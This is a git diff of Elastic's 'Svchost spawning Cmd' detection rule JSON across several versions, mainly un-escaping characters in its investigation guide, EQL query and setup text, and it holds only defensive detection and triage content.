a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_104.json +++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_104.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Svchost spawning Cmd", - "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n\n process.parent.name : \"svchost.exe\" and process.name : \"cmd.exe\" and\n\n not process.args :\n (\"??:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat?\",\n \"?:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat\",\n \"\\\\system32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\system32\\\\silcollector.cmd\",\n \"\\\\system32\\\\AppHostRegistrationVerifier.exe\",\n \"\\\\system32\\\\ServerManagerLauncher.exe\",\n \"dir\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\LSDeployment\\\\Lspush.exe\",\n \"(x86)\\\\FMAuditOnsite\\\\watchdog.bat\",\n \"?:\\\\ProgramData\\\\chocolatey\\\\bin\\\\choco-upgrade-all.bat\",\n \"Files\\\\Npcap\\\\CheckStatus.bat\") and\n\n /* very noisy pattern - bat 
or cmd script executed via scheduled tasks */\n not (process.parent.args : \"netsvcs\" and process.args : (\"?:\\\\*.bat\", \"?:\\\\*.cmd\"))\n", "references": [ "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_105.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_105.json index 9828ceb6e49..13e4d305bcd 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_105.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Svchost spawning Cmd", - "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n\n process.parent.name : \"svchost.exe\" and process.name : \"cmd.exe\" and\n\n not process.args :\n (\"??:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat?\",\n \"?:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat\",\n \"\\\\system32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\system32\\\\silcollector.cmd\",\n \"\\\\system32\\\\AppHostRegistrationVerifier.exe\",\n \"\\\\system32\\\\ServerManagerLauncher.exe\",\n \"dir\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\LSDeployment\\\\Lspush.exe\",\n \"(x86)\\\\FMAuditOnsite\\\\watchdog.bat\",\n \"?:\\\\ProgramData\\\\chocolatey\\\\bin\\\\choco-upgrade-all.bat\",\n \"Files\\\\Npcap\\\\CheckStatus.bat\") and\n\n /* very noisy pattern - bat or cmd script executed via scheduled tasks */\n not (process.parent.args : \"netsvcs\" and process.args : (\"?:\\\\*.bat\", \"?:\\\\*.cmd\"))\n", "references": [ "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" 
@@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_106.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_106.json index 7f5f627b15b..07dfa1fd194 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_106.json +++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_106.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Svchost spawning Cmd", - "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n\n process.parent.name : \"svchost.exe\" and process.name : \"cmd.exe\" and\n\n not process.args :\n (\"??:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat?\",\n \"?:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat\",\n \"\\\\system32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\system32\\\\silcollector.cmd\",\n \"\\\\system32\\\\AppHostRegistrationVerifier.exe\",\n \"\\\\system32\\\\ServerManagerLauncher.exe\",\n \"dir\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\LSDeployment\\\\Lspush.exe\",\n \"(x86)\\\\FMAuditOnsite\\\\watchdog.bat\",\n \"?:\\\\ProgramData\\\\chocolatey\\\\bin\\\\choco-upgrade-all.bat\",\n \"Files\\\\Npcap\\\\CheckStatus.bat\") and\n\n /* very noisy pattern - bat or cmd script executed via scheduled tasks */\n not (process.parent.args : \"netsvcs\" and process.args : (\"?:\\\\*.bat\", \"?:\\\\*.cmd\"))\n", "references": [ "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" 
@@ -63,7 +63,7 @@
 ],
 "risk_score": 21,
 "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_107.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_107.json
index 412192abec6..976bd35ad59 100644
--- a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_107.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Svchost spawning Cmd", - "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
